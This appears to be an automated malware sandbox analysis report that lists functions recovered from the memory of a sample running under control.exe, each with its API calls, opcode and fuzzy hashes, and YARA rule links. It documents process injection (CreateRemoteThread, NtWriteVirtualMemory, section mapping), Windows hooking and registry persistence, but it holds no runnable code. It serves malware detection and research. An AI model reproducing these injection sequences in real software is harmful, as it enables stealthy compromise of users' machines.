Opcode ID: 26ecc3f083c1ffb0cefd74b1de216f15afe46240b3f4b5299f8ce30b3ebc73e5
Instruction ID: 6cd6c320d4395abb220e05eca7ad9fa9275c22a18f77f9b1ec5a9b42f8bbdccb
Opcode Fuzzy Hash: 26ecc3f083c1ffb0cefd74b1de216f15afe46240b3f4b5299f8ce30b3ebc73e5
Instruction Fuzzy Hash: 3F419170618F188FE748EF68EC8966977E5F798701F10456EE44BC3261EB34E9418BC2

Uniqueness

Uniqueness Score: -1.00%

Function 03B57C14, Relevance: 1.6, APIs: 1, Instructions: 136pipeCOMMON

Download Yara Rule

APIs

CallNamedPipeA.KERNEL32 ref: 03B57D09

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CallNamedPipe
String ID:
API String ID: 1741058652-0
Opcode ID: 9a45f0ede016ce97d9b680a91e164d5bb54c59ea138d900570a2cd332b6145af
Instruction ID: 877b471702b63e427163ffd99e17756f2f333d56f44031924c7336c9458f9ce7
Opcode Fuzzy Hash: 9a45f0ede016ce97d9b680a91e164d5bb54c59ea138d900570a2cd332b6145af
Instruction Fuzzy Hash: 0E41E870618B088FD72CEF18E88A676B7E4FB58705B14056EED4AC3251EF74E842CB85

Uniqueness

Uniqueness Score: -1.00%

Function 03B51890, Relevance: 1.6, APIs: 1, Instructions: 114fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03B68518: GetTempFileNameA.KERNEL32 ref: 03B6858F

CreateFileA.KERNEL32 ref: 03B51904

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: File$CreateNameTemp
String ID:
API String ID: 3817792521-0
Opcode ID: 90369b635abd83b50a4f8c1fa5bd566b9854a943aaf6229c7df980fc076d0174
Instruction ID: ca33d60937f8a5c2bc3e929bcaebe47e77fe4cd791697f72ab82e80296448538
Opcode Fuzzy Hash: 90369b635abd83b50a4f8c1fa5bd566b9854a943aaf6229c7df980fc076d0174
Instruction Fuzzy Hash: AE31A030708B084FEB98EB2D985932A77D6EBD8305F144579E94AC3261EF38D8468782

Uniqueness

Uniqueness Score: -1.00%

Function 03B78744, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 03B787E8

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7cf46c9985917145bb2146d3f80033df1692681f115b5e2086595519b7c33a3f
Instruction ID: b3ce56797c62660c455916c78678bea6f944ee4c468a8fb55b73d67aa4f71e8f
Opcode Fuzzy Hash: 7cf46c9985917145bb2146d3f80033df1692681f115b5e2086595519b7c33a3f
Instruction Fuzzy Hash: C9314F7060CB484FDB68EF1C9889A65B3E1FB98311F14466EE84DC3261DF30E8418B86

Uniqueness

Uniqueness Score: -1.00%

Function 03B6E988, Relevance: 1.6, APIs: 1, Instructions: 106registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32 ref: 03B6E9B6

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 1f5983467197bd5ab2a4585b8d7cc982bf0a0f1d280e7fb5bd3c16dff1eec3b3
Instruction ID: b7a6f3fe377d74695c14f6b930f11ea192b49a7af9ca24e514fe3e0e4676868d
Opcode Fuzzy Hash: 1f5983467197bd5ab2a4585b8d7cc982bf0a0f1d280e7fb5bd3c16dff1eec3b3
Instruction Fuzzy Hash: C3314F34618B498FD784EF68D988B6AB7E0FB98305F54497EF44AC3261DB38D941CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03B6E4F4, Relevance: 1.6, APIs: 1, Instructions: 105registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32 ref: 03B6E534

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 79ee13e536384f7b1633aad1c2599a6e2b3821c7fa611078cf30fcfaa1702c6e
Instruction ID: 857ed7eb717538bc6055541151a1e0d876187da9e8bfd7670da4150333e051b3
Opcode Fuzzy Hash: 79ee13e536384f7b1633aad1c2599a6e2b3821c7fa611078cf30fcfaa1702c6e
Instruction Fuzzy Hash: 57317134618B088FDB48EF28E8D966677E1FB98355F14456EE84AC3355EF34D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B70F54, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 03B70FF6

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 3eda59e2be473b3dc26175e9670a793b1f9ff9ccfe90412f4932646b6eaa67be
Instruction ID: 420f70add4c1266686784dd6fd15e1718c271d7531dda53be02dd05e66e5bd7a
Opcode Fuzzy Hash: 3eda59e2be473b3dc26175e9670a793b1f9ff9ccfe90412f4932646b6eaa67be
Instruction Fuzzy Hash: 8021C434718A0C4FEB58EF6CA89967973D1F798300F14857DE55FC3252EE24E8468781

Uniqueness

Uniqueness Score: -1.00%

Function 03B5B12C, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 03B5B1FC

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e5f109c54b343c2c6b63ea9c9b8dd5eb65cd567dabbddd775d3013257b510bdd
Instruction ID: 4bb6ca31be18acc7e941376a6202a8e18517133f2120a5e021f1fa22371edf4c
Opcode Fuzzy Hash: e5f109c54b343c2c6b63ea9c9b8dd5eb65cd567dabbddd775d3013257b510bdd
Instruction Fuzzy Hash: 15219530718A084BDB58EF29D89827977E5EB98305B14457DEC4BC3251EE38D906C792

Uniqueness

Uniqueness Score: -1.00%

Function 03B68518, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32 ref: 03B6858F

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: fa0353841b10cc5731f88f7c4ef9f0a47fae43dec611cba9f2d36ae8dd62ba4a
Instruction ID: a1bcd8cf476f40280b045ceb4244b5c97cdd8644bb3125abc68508f12bfd2d37
Opcode Fuzzy Hash: fa0353841b10cc5731f88f7c4ef9f0a47fae43dec611cba9f2d36ae8dd62ba4a
Instruction Fuzzy Hash: 0E213631708A054FAB54DF79ACE866A77E3FBD83517488179A806C3275DF38D4418B81

Uniqueness

Uniqueness Score: -1.00%

Function 03B70E90, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32 ref: 03B70F0B

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 7ca9d918fa1af0a0fdd9cf1e0200d1ed2bf98d5301a9baf5a7fef860294ce6d5
Instruction ID: efb03dea3ed6eb92ccf6077203c18c4896b3e87c7c04dde6ec42a45852bd94af
Opcode Fuzzy Hash: 7ca9d918fa1af0a0fdd9cf1e0200d1ed2bf98d5301a9baf5a7fef860294ce6d5
Instruction Fuzzy Hash: A1215430608E088FFB98FF6D98596A577E2FB9C311B45816AA44DC3361DA38D951CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B6F7FC, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 03B6F816

Part of subcall function 03B5699C: gethostbyname.WS2_32 ref: 03B56A53
Part of subcall function 03B5699C: WSACleanup.WS2_32 ref: 03B56A8C

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CleanupStartupgethostbyname
String ID:
API String ID: 3994641901-0
Opcode ID: 26ba982f2238380c7012342040bc7dddff7ecf7c8b90d553cb0e23f63e88a60e
Instruction ID: 12a73522de8f7a9f40dbb6bca1a67a1ab1a3b6ec59f7dc62d19d781403af295d
Opcode Fuzzy Hash: 26ba982f2238380c7012342040bc7dddff7ecf7c8b90d553cb0e23f63e88a60e
Instruction Fuzzy Hash: 8711EB31B14D40CBE738D718E4C927CA391D79830CF1C69FFE547E65D2C92C84AA4242

Uniqueness

Uniqueness Score: -1.00%

Function 03B61FC0, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 03B61FF3

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 40f5aecf288f058d529883b6c903815f00a8116155dae9c90ee8ca9008adc625
Instruction ID: b99c6daf1b1c6fc754d6e647e90e69c496ef1446d32bcc0168cb72a4fb832fe0
Opcode Fuzzy Hash: 40f5aecf288f058d529883b6c903815f00a8116155dae9c90ee8ca9008adc625
Instruction Fuzzy Hash: B611933160CB088FAB14EF18A485465B3E5FB9C305754497DEC4FC3256EB34E905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 03B57304, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32 ref: 03B573B0

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d765e3e3718618cb85700a983ef7fc8a9b7ec9735ccd6c98b5bd498846155ae6
Instruction ID: c419b042da67508b84d943f5ef7abc2ffdeb05fca26ea99d2f617fe2d2aae67d
Opcode Fuzzy Hash: d765e3e3718618cb85700a983ef7fc8a9b7ec9735ccd6c98b5bd498846155ae6
Instruction Fuzzy Hash: D9217530318F098FEB64DF2CD888B6A77E1FBA8311B25456DE949C3260DF74D9058B41

Uniqueness

Uniqueness Score: -1.00%

Function 03B77118, Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 03B77181

Part of subcall function 03B6D840: RegSetValueExA.KERNEL32 ref: 03B6D89D
Part of subcall function 03B6D840: RegCloseKey.KERNEL32 ref: 03B6D8B2

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CloseTimerValueWaitable
String ID:
API String ID: 1352355977-0
Opcode ID: b8055bdc64d070f9f3307da74a2724f918168a14fa99c35e6605fc23c62bdb82
Instruction ID: 724c624721cc5cc3f3f26e051e96e390440c7d0d00bb7edef9306d8ab26fc3b8
Opcode Fuzzy Hash: b8055bdc64d070f9f3307da74a2724f918168a14fa99c35e6605fc23c62bdb82
Instruction Fuzzy Hash: 67019231218B088FDB45EB58D48866AB7E0FBE8315F000A6DE54AC3164DE39C4818B82

Uniqueness

Uniqueness Score: -1.00%

Function 03B775C8, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 03B672AC: NtWriteVirtualMemory.NTDLL ref: 03B672CB

VirtualProtectEx.KERNEL32 ref: 03B7761C

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 6b80a691fc55ab5c1cd3b8c67872d3b4e18e59a3d90c2657b09483c02a5fecf1
Instruction ID: 32812b48e3dc976cf1b2e2bb90d2485f547eea3f0e2596c89f440879b45e32ec
Opcode Fuzzy Hash: 6b80a691fc55ab5c1cd3b8c67872d3b4e18e59a3d90c2657b09483c02a5fecf1
Instruction Fuzzy Hash: 53012C70A18B088FCB48EF5DE4C5525B7E0EB9C311B4445BEE94EC725ADB70D984CB86

Uniqueness

Uniqueness Score: -1.00%

Function 03B79E74, Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,03B64610,?,?,?,?,?,?,?,03B51A14), ref: 03B79E90

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6b14ba749e5c17451b315d32cd9aade869d59cef1678bce606a4806857cc1cca
Instruction ID: 2f4a5e66664b88d2b1ddb7f37bba5ccb85643902ea9394290f9a7b102968dff3
Opcode Fuzzy Hash: 6b14ba749e5c17451b315d32cd9aade869d59cef1678bce606a4806857cc1cca
Instruction Fuzzy Hash: 6001F9B0514A0D8FD384EFAED4C8A217BE4FB6C21675545BF941DCB231D7348984CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03B717BC, Relevance: 1.5, APIs: 1, Instructions: 36synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 03B717FA

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 70eb9e60f32975f5a9ad71b0888d1fb79f301fec675d6ad3429f5ec508343b5b
Instruction ID: c2f38db58ea78578237d2f1867b36d3a00bb1331b0ab218df31f77f4c15a4978
Opcode Fuzzy Hash: 70eb9e60f32975f5a9ad71b0888d1fb79f301fec675d6ad3429f5ec508343b5b
Instruction Fuzzy Hash: D9F06530318E094FE758EBADAC8866577D1E7EC311F04403AB409D3264DE78CD508752

Uniqueness

Uniqueness Score: -1.00%

Function 03B5E170, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32 ref: 03B5E18C

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 3ce8c9fb31d90310991f9aaaddf36bceefc33733bb7b76f9ba0bbe2af62e22e5
Instruction ID: 21e597c97d6b206d7e95233510fb62818725c86ca27ade36bf61196d54adac3c
Opcode Fuzzy Hash: 3ce8c9fb31d90310991f9aaaddf36bceefc33733bb7b76f9ba0bbe2af62e22e5
Instruction Fuzzy Hash: DBE06D20314B084FABA4FFB89DC827D72D2EB88119748487EF905C7254D938C8858741

Uniqueness

Uniqueness Score: -1.00%

Function 03B78028, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32 ref: 03B7804F

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 0696826fd2425e12be9b0c88779f91b939be5e6bb5c8bcaf8d7a0641d640170c
Instruction ID: 7224858dd1cc9767dd5fea9ac542f3923df048912a1948f5ea3f60eb06f24677
Opcode Fuzzy Hash: 0696826fd2425e12be9b0c88779f91b939be5e6bb5c8bcaf8d7a0641d640170c
Instruction Fuzzy Hash: 50F06D31618E094FEB58EF38E88956A77E1E798211B14466AE42AC3254EB38D5818B81

Uniqueness

Uniqueness Score: -1.00%

Function 03B684C8, Relevance: 1.5, APIs: 1, Instructions: 30threadCOMMON

Download Yara Rule

APIs

RtlExitUserThread.NTDLL ref: 03B68511

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: ExitThreadUser
String ID:
API String ID: 3424019298-0
Opcode ID: 8d99a81a334ba6fbb5373092fa279f0551ad302745a075031640ebdafcc17e37
Instruction ID: 938658973695526170341b2b67b692d36d9e4c8613e1416572d76d2572b1419b
Opcode Fuzzy Hash: 8d99a81a334ba6fbb5373092fa279f0551ad302745a075031640ebdafcc17e37
Instruction Fuzzy Hash: A4F012302186058FE759DF38DCD5265BBA2EB84315704C69CA45ACA5A5DF389806C741

Uniqueness

Uniqueness Score: -1.00%

Function 03B7969F, Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 03B796B9

Memory Dump Source

Source File: 00000025.00000002.641726532.0000000003B51000.00000020.00000001.sdmp, Offset: 03B51000, based on PE: false

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 7810ade48ceb14f1c577769bee946d6a6e11ba54b48f1105654df25cb13f9ac4
Instruction ID: e6387952484995244aa0837aaea69348d7c6c673c17876921f5015132766e975
Opcode Fuzzy Hash: 7810ade48ceb14f1c577769bee946d6a6e11ba54b48f1105654df25cb13f9ac4
Instruction Fuzzy Hash: CEE0C23230CB540FEB48A68CB8435B473C0E385331B10103EF586C2202E916E413078A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: control.exe PID: 5128 Parent PID: 5508 control.exeCOMMON

Executed Functions

Function 009C6A5C, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 648memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 009C6B04

Strings

@, xrefs: 009C6F3B

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: AllocateHeap
String ID: @
API String ID: 1279760036-2766056989
Opcode ID: df9999ad1371f6775146a5a642c9b5fcf4651608be9b946bdb7d09e9f0f86fdb
Instruction ID: b4b53f8481a2e0dc6f92f7a568dbb8fc2c8907a41d3f6a2cf510312fcf83125a
Opcode Fuzzy Hash: df9999ad1371f6775146a5a642c9b5fcf4651608be9b946bdb7d09e9f0f86fdb
Instruction Fuzzy Hash: C6125430618E098FDB59EF68D895F66B3E5FB98301F40462EE54AC3251EF34E945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009C10A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationToken.NTDLL ref: 009C1154
NtQueryInformationToken.NTDLL ref: 009C119C
NtClose.NTDLL ref: 009C11D4

Strings

0, xrefs: 009C10FF

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 3821b13fdee61393d8201b82e2ad874d5ba9cf6c48eb3caa2c2352ede4b1addb
Instruction ID: 20ec22fb6088f9364ddbe5e9c1fea017075e70017f00d78329a5d621dcc2360b
Opcode Fuzzy Hash: 3821b13fdee61393d8201b82e2ad874d5ba9cf6c48eb3caa2c2352ede4b1addb
Instruction Fuzzy Hash: DA310A30618B888FD764EF69D8C4B9AB7E5FBD9301F504A2DE58EC3250DB349945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009A2710, Relevance: 6.2, APIs: 4, Instructions: 187nativethreadinjectionCOMMON

Download Yara Rule

APIs

NtSetInformationProcess.NTDLL ref: 009A27B8
CreateRemoteThread.KERNELBASE ref: 009A285E
FindCloseChangeNotification.KERNELBASE ref: 009A28B0

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
String ID:
API String ID: 1964589409-0
Opcode ID: 5d99f2c2c8f49470327325e2a9c4fb84222903334073c307134f8fd040975a90
Instruction ID: 7bce5d281ab952815c602cbb1506c0e5cc959b15300e320385edfbbf1107fa7b
Opcode Fuzzy Hash: 5d99f2c2c8f49470327325e2a9c4fb84222903334073c307134f8fd040975a90
Instruction Fuzzy Hash: C9519130618B098FD728EF2CD88966677E5FB9A301F10452DE94AC3261EF38DD45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009AE2F0, Relevance: 4.8, APIs: 3, Instructions: 303memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 009AE351
VirtualAlloc.KERNELBASE ref: 009AE45A
VirtualFree.KERNELBASE ref: 009AE536

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: Virtual$AllocCreateFreeHeap
String ID:
API String ID: 2341667014-0
Opcode ID: 387cc7682204ae4d9a0c54c31e49e59cc3dc5be86b4bf12ba6832ed983167f0e
Instruction ID: 317cc35da845b574d100c7d786a6e7c9759622723dc718fcc765c8959f2f47ee
Opcode Fuzzy Hash: 387cc7682204ae4d9a0c54c31e49e59cc3dc5be86b4bf12ba6832ed983167f0e
Instruction Fuzzy Hash: 3491D830618B498FDB68EF28EC9576A37D5FB99315F50452DE887C3251EF38D8028B81

Uniqueness

Uniqueness Score: -1.00%

Function 009AF8AC, Relevance: 4.1, APIs: 2, Instructions: 1128synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexExA.KERNEL32 ref: 009AF979
GetUserNameA.ADVAPI32 ref: 009AFB9A

Part of subcall function 009BB64C: CreateThread.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009BB67C
Part of subcall function 009BB64C: QueueUserAPC.KERNELBASE ref: 009BB693

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: e107f95206ea1759afd0aa749ae430eba4298a2b5f310c18b36aee93495cfbbc
Instruction ID: eff1cfa86e7a1fe257bc5506d1018786c22967e8d58b65279707d49b735d2bab
Opcode Fuzzy Hash: e107f95206ea1759afd0aa749ae430eba4298a2b5f310c18b36aee93495cfbbc
Instruction Fuzzy Hash: D472E671618A088FE738EF68EC956A673E5F799710720453ED48BC3261DE38D947CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009A8790, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 009A8932

Part of subcall function 009B13A8: NtMapViewOfSection.NTDLL ref: 009B13F4

Strings

0, xrefs: 009A8926

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: Section$CreateView
String ID: 0
API String ID: 1585966358-4108050209
Opcode ID: e98382719e47ce79b272ec845e25f25eebabc307cf9bcbfb5ceebf661db9868d
Instruction ID: 0bd186b154a3fa8427dbfb4fea4eb41c027267f4c07cdf5e6dccb8a76208debc
Opcode Fuzzy Hash: e98382719e47ce79b272ec845e25f25eebabc307cf9bcbfb5ceebf661db9868d
Instruction Fuzzy Hash: 9D61B17021CB098FDB54EF28D885676B7E5FBD9301F14456EE84AC7261EB34D942CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009BF0C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 009BF0FD

Strings

@, xrefs: 009BF0E1

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 88b8825b9b3689d044394f35be5b99f0b658dcc5545216e4aa40f955ceee6651
Instruction ID: a2aa43f399b3b4966639179561b1ce1652c2c76d78460b30393efb4d5ae8d141
Opcode Fuzzy Hash: 88b8825b9b3689d044394f35be5b99f0b658dcc5545216e4aa40f955ceee6651
Instruction Fuzzy Hash: 73F090B0619A048BDB449FA8D8CD679BAE0FB58311F400D6CE11ACB254DB788A048745

Uniqueness

Uniqueness Score: -1.00%

Function 009DA004, Relevance: 3.3, APIs: 2, Instructions: 332nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 009DA27A
NtProtectVirtualMemory.NTDLL ref: 009DA309

Memory Dump Source

Source File: 00000026.00000002.458521163.00000000009DA000.00000040.00000001.sdmp, Offset: 009DA000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: efd0b9942530d15e88fae815af20ccf5e2d82f5600fba78b1fe33bbb9fc72ad8
Instruction ID: 48e5cdd6b7f69ac8e9ef8140d60a9abe6025e9e664b7aed0cdc2f8b960341148
Opcode Fuzzy Hash: efd0b9942530d15e88fae815af20ccf5e2d82f5600fba78b1fe33bbb9fc72ad8
Instruction Fuzzy Hash: 11A1043125CB884FC729DF68C8817A9B7E1FB96310F588A6ED0CBC7352D634A4568787

Uniqueness

Uniqueness Score: -1.00%

Function 009B8208, Relevance: 1.7, APIs: 1, Instructions: 183nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 009B827D

Part of subcall function 009B0BE8: NtReadVirtualMemory.NTDLL ref: 009B0C07

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: InformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 1498878907-0
Opcode ID: 20cfe99fdf9d183f322bb0a75281e08624d6776da5c15488ca49e86960bdab9f
Instruction ID: 17f2c1f36fbd39efb526c37488511847aa3463458191d78a6bb9ee8a26290f7b
Opcode Fuzzy Hash: 20cfe99fdf9d183f322bb0a75281e08624d6776da5c15488ca49e86960bdab9f
Instruction Fuzzy Hash: C7518F3021CB588BDB59EB28D9957E773E9FBD8311F04452EA84EC3245DE34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 009B23A4, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 009B23CA

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1bfb4a0377598c79d0d0a3324faf4bd036f0c13e57f4dbdeb4fbbbd026dcd8ec
Instruction ID: 3171b6f04af394560ba5b18e7032b5706174f5a47e5c230714072db8245ad4ad
Opcode Fuzzy Hash: 1bfb4a0377598c79d0d0a3324faf4bd036f0c13e57f4dbdeb4fbbbd026dcd8ec
Instruction Fuzzy Hash: 8401A430318E0E8F9B84EF68D8C4AA573E4FBA8715750056EE80AC7264D73CD886CB01

Uniqueness

Uniqueness Score: -1.00%

Function 009B13A8, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 009B13F4

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: a3299e76c325dc9b08938c361122fd9dc9a4dc04a9c5a82e5c2635bb5eba654b
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: EC01D6B0A08B048FCB44DF69D0C9569BBE1FB58311B50066FE949C77A6DB70D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 009B72AC, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 009B72CB

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: d68a1f52039c4d47fbcfb6048c9a6b8debc0f19383dc57e2be5056b0ab382f09
Instruction ID: 7580e086aa6ba875a0e157f8530423a6df59a7544de13bc75d1dbf81f524231c
Opcode Fuzzy Hash: d68a1f52039c4d47fbcfb6048c9a6b8debc0f19383dc57e2be5056b0ab382f09
Instruction Fuzzy Hash: ACE0DF30B29A444BEB046BF88DCC2B9B3D0F7C8316F404A39F969C7320D62DC8409342

Uniqueness

Uniqueness Score: -1.00%

Function 009B0BE8, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 009B0C07

Memory Dump Source

Source File: 00000026.00000002.458306655.00000000009A1000.00000020.00000001.sdmp, Offset: 009A1000, based on PE: false

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: cec383d4cd5be70a93901608133fcba7ac5038a2d71a3e75e1f85135671025c5
